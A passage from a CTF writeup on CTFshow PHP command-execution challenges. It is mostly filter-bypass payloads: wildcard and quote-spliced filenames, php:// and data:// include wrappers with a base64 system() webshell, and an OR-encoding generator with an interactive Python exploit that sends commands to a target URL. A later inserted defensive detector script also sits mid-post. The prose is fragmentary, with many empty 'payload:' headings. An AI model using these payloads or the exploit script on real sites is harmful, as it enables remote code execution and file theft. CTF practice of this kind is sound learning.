[Original] CTFSHOW Command Execution WP
Posted: 2021-9-22 17:26 27230

flag is filtered.

payload:

A few random tricks:

Filtered: flag|system|php

Execute the command with echo and backticks.

payload:

Filtered: flag|system|php|cat|sort|shell|\.| |

No problem, we have plenty of tricks.

payload:

include needs no parentheses, and the semicolon can be replaced by ?>.

payload:

payload:

payload:

flag is filtered.

payload:

payload:

In theory it is XOR.

But I'm lazy.

Pasting the exp:

The exp is taken from https://wp.ctf.show/d/137-ctfshow-web-web41/4

/dev/null 2>&1 sends all output streams (both stdout and stderr) to the null device, where they are discarded.

%0a, %26 and || cut the command off.
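A defender-side example added here, not part of the original post: it reverses the string-OR encoding the web41 exp above relies on and then flags the other evasions this writeup collects (the %0a line cut, php:// and data:// wrappers, glob-style filenames, quote-spliced names) inside a query string. The indicator names and the sample query strings are constructed.

```python
import re
from itertools import zip_longest
from urllib.parse import parse_qsl

# A PHP string-OR expression such as ("\x13\x19"|"\x60\x60"), as it looks once the
# request's percent-encoding is removed. PHP applies | byte-wise and pads the shorter
# operand with NUL bytes; fold_or_pairs() reproduces that.
OR_PAIR = re.compile(rb'\(\s*"([^"]*)"\s*\|\s*"([^"]*)"\s*\)')

# Indicators checked against the folded, decoded parameter value (names are constructed).
INDICATORS = {
    "shell_function": re.compile(r"\b(system|exec|passthru|shell_exec|popen|proc_open)\b|`", re.I),
    "include_wrapper": re.compile(r"\b(include|require)\b|\b(php|data)://", re.I),
    "line_cut": re.compile(r"[\r\n]|\|\||&&"),            # %0a, ||, && separators
    "glob_filename": re.compile(r"\b\w+[?*]+"),          # fl??????, fl*, f*
    "quote_splice": re.compile(r"\w(\"\"|'')\w|\w\\\w"),  # fla""g, fla''g, fla\g
}

def fold_or_pairs(raw: bytes) -> bytes:
    """Replace every ("a"|"b") with ("a OR b") so the real string becomes visible."""
    def combine(m) -> bytes:
        ored = bytes(x | y for x, y in zip_longest(m.group(1), m.group(2), fillvalue=0))
        return b'("' + ored + b'")'
    return OR_PAIR.sub(combine, raw)

def normalize_param(value: str) -> str:
    """value is a once-decoded parameter value holding one char per byte (latin-1)."""
    return fold_or_pairs(value.encode("latin-1")).decode("latin-1")

def scan_query(query: str) -> dict:
    """Return {parameter: [indicator, ...]} for every parameter that trips a check."""
    hits = {}
    for name, value in parse_qsl(query, keep_blank_values=True, encoding="latin-1"):
        folded = normalize_param(value)
        found = [label for label, rx in INDICATORS.items() if rx.search(folded)]
        if found:
            hits[name] = found
    return hits

if __name__ == "__main__":
    # Constructed sample query strings modelled on the writeup's payloads, not live traffic.
    samples = [
        'c=("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%03%01%14"|"%60%60%60");',
        "c=ls%0anl%20fl??????",
        "page=home&lang=en",
    ]
    for q in samples:
        print(q, "->", scan_query(q))
```

Run it over the GET parameters in an access log (or the decoded POST body) rather than over a blocklist of raw substrings, since the folded form is what the PHP interpreter actually sees.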

payload:

Filtered: ;|cat

payload:

flag is filtered as well.

Wildcards take care of it.

payload:

Spaces are filtered.

payload:

Filtered: \;|cat|flag| |[0-9]|\\$|\*/

payload:

payload:

payload:

payload:

payload:

= = Only digits are allowed.

Sorry, the fancy tricks start here.

payload:

https://blog.csdn.net/qq_46091464/article/details/108513145

Request packet:

Make up 36.

-37 bitwise-inverted = 36

payload:

Bypassing disable_functions

I could only think of one way.

file() can read a file into an array, which is then printed out.

payload:

payload:

payload:

= = Wow.

So much is banned.

payload:

ob_get_contents: returns the contents of the output buffer. ob_end_clean: cleans (erases) the output buffer and turns off output buffering.

ob_end_clean() discards the contents of the topmost output buffer and turns that buffer off. If you want to process the buffer's contents further, you must call ob_get_contents() before ob_end_clean(), because the contents are discarded when ob_end_clean() is called.

y4's blog explains it clearly: https://blog.csdn.net/solitudi/article/details/109837640?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163062881716780269897928%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=163062881716780269897928&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-109837640.first_rank_v2_pc_rank_v29&utm_term=y4tacker+%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C&spm=1018.2226.3001.4187

payload:

Just read y4's blog = = I won't paste the payload, it's too long.

## web73

Take a look at the directory.

Then

payload:

Same as web73.

Scan the directory.

Read the file with MySQL load_file.

I'm not quite sure how this challenge is meant to be solved,

but I reproduced it.

https://www.laruence.com/2020/03/11/5475.html

https://blog.csdn.net/miuzzx/article/details/108619930

 
 
```
/?c=system("nl fl??????");
/?c=system("nl fl*");
/?c=system("nl fla''g.php");
/?c=echo `nl fla""g.php`;
/?c=echo `nl fla\g.php`;
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=eval($_GET[1]);&1=system('nl flag.php');
```
I don't know the rest.
 
 
```
/?c=echo `nl fla""g.p""hp`;
/?c=echo `nl fla?????`;
/?c=echo `nl f*`;
/?c=eval($_GET[1]);&1=system('nl flag.php');
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
```
 
 
```
/?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
```
 
```
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
```
```php
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
```
```
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php system("nl fla*");?>
```
 
```
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php%20system("nl%20f*");?>
```
 
 
```python
import re

# Characters rejected by the challenge's PHP filter. The PHP regex delimiters
# (the surrounding slashes) are dropped here: with them kept, the "/[0-9]" and
# "\-/" alternatives never match a single character in Python's re, so digits
# and '-' would wrongly be treated as allowed.
preg = r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-'
content = ''
for i in range(256):
    for j in range(256):
        # keep the pair only if neither byte is rejected by the filter
        if not (re.match(preg, chr(i), re.I) or re.match(preg, chr(j), re.I)):
            k = i | j
            if 32 <= k <= 126:  # only printable results are useful
                a = '%' + hex(i)[2:].zfill(2)
                b = '%' + hex(j)[2:].zfill(2)
                # one line per printable char: "<char> %xx %yy"
                content += chr(k) + ' ' + a + ' ' + b + '\n'
with open('rce_or.txt', 'w') as f:
    f.write(content)
```
```python
# -*- coding: utf-8 -*-
import os
import sys
import urllib.parse
import requests

# rce_or.txt must exist before this runs; the generator script above produces it.
os.system("php rce_or.php")  # if php is not on PATH, run the generator manually
if len(sys.argv) != 2:
    print("=" * 50)
    print('USAGE: python exp.py <url>')
    print("eg:  python exp.py http://ctf.show/")
    print("=" * 50)
    sys.exit(0)
url = sys.argv[1]

def action(arg):
    """Look up each char of arg in rce_or.txt and build the ("..."|"...") expression."""
    s1 = ""
    s2 = ""
    for i in arg:
        with open("rce_or.txt", "r") as f:
            for t in f:          # lines look like: a %01 %60
                if t[0] == i:
                    s1 += t[2:5]  # first operand, e.g. %01
                    s2 += t[6:9]  # second operand, e.g. %60
                    break
    return '("' + s1 + '"|"' + s2 + '")'

while True:
    param = action(input("\n[+] your function:")) + action(input("[+] your command:"))
    data = {
        'c': urllib.parse.unquote(param)
    }
    r = requests.post(url, data=data)
    print("\n[*] result:\n" + r.text)
```
